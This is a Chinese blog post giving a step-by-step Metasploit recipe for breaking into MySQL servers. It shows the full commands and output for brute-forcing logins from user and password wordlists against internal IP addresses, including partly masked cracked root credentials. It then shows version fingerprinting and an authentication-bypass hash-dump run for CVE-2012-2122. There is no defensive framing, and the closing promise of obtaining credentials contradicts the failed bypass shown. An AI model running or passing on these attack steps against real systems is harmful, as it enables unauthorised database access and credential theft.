欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

用Metasploit破解Mysql用户名和密码

程序员文章站 2022-03-01 21:54:03
 下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。 msf auxiliar...

 下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。

msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options 

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT                              yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           5                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS 10.199.169.160
RHOSTS => 10.199.169.160
msf auxiliary(mysql_login) > set RPORT 3307 
RPORT => 3307
msf auxiliary(mysql_login) > set USER_FILE /home/user.txt
USER_FILE => /home/user.txt
msf auxiliary(mysql_login) > set PASS_FILE /home/pass.txt 
PASS_FILE => /home/pass.txt
msf auxiliary(mysql_login) > 
msf auxiliary(mysql_login) > exploit 

[*] 10.199.169.160:3307 MYSQL - Found remote MySQL version 5.5.31
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:root (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:vipshop (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:vipshop!@# (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: tms:cdtms (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160:3307 MYSQL - Success: 'root:vi****p'
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:root (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:vipshop (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[-] 10.199.169.160:3307 MYSQL - LOGIN FAILED: cdtms:vipshop!@# (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))
[+] 10.199.169.160:3307 MYSQL - Success: 'cdt**s:cdt**s'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

另外,针对某些特定的Mysql版本,也可以采取一些特定的手段,比如Mysql的漏洞:CVE-2012-2122

用Metasploit破解Mysql用户名和密码

假设我们得到了一个Mysql为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库(下面这个只是操作过程,数据库版本不是含漏洞版本)

msf > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(mysql_version) > show options 

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    3306             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_version) > set THREADS 5
THREADS => 5
msf auxiliary(mysql_version) > exploit 

[*] 10.199.128.61:3306 is running MySQL 5.5.44-log (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

第一步就是获取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事实上有IP足够了,所有端口开放的服务都能扫描得到)

msf auxiliary(mysql_hashdump) > search CVE-2012-2122

Matching Modules
================

   Name                                               Disclosure Date  Rank    Description
   ----                                               ---------------  ----    -----------
   auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal  MySQL Authentication Bypass Password Dump


msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > 
msf auxiliary(mysql_authbypass_hashdump) > 
msf auxiliary(mysql_authbypass_hashdump) > show options 

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  root             yes       The username to authenticate as

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61
RHOSTS => 10.199.128.61
msf auxiliary(mysql_authbypass_hashdump) > exploit 

[+] 10.199.128.61:3306 The server allows logins, proceeding with bypass test
[*] 10.199.128.61:3306 Authentication bypass is 10% complete
[*] 10.199.128.61:3306 Authentication bypass is 20% complete
[*] 10.199.128.61:3306 Authentication bypass is 30% complete
[*] 10.199.128.61:3306 Authentication bypass is 40% complete
[*] 10.199.128.61:3306 Authentication bypass is 50% complete
[*] 10.199.128.61:3306 Authentication bypass is 60% complete
[*] 10.199.128.61:3306 Authentication bypass is 70% complete
[*] 10.199.128.61:3306 Authentication bypass is 80% complete
[*] 10.199.128.61:3306 Authentication bypass is 90% complete
[*] 10.199.128.61:3306 Authentication bypass is 100% complete
[-] 10.199.128.61:3306 Unable to bypass authentication, this target may not be vulnerable
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

然后这样就这么简单,你会得到一个用户名和密码。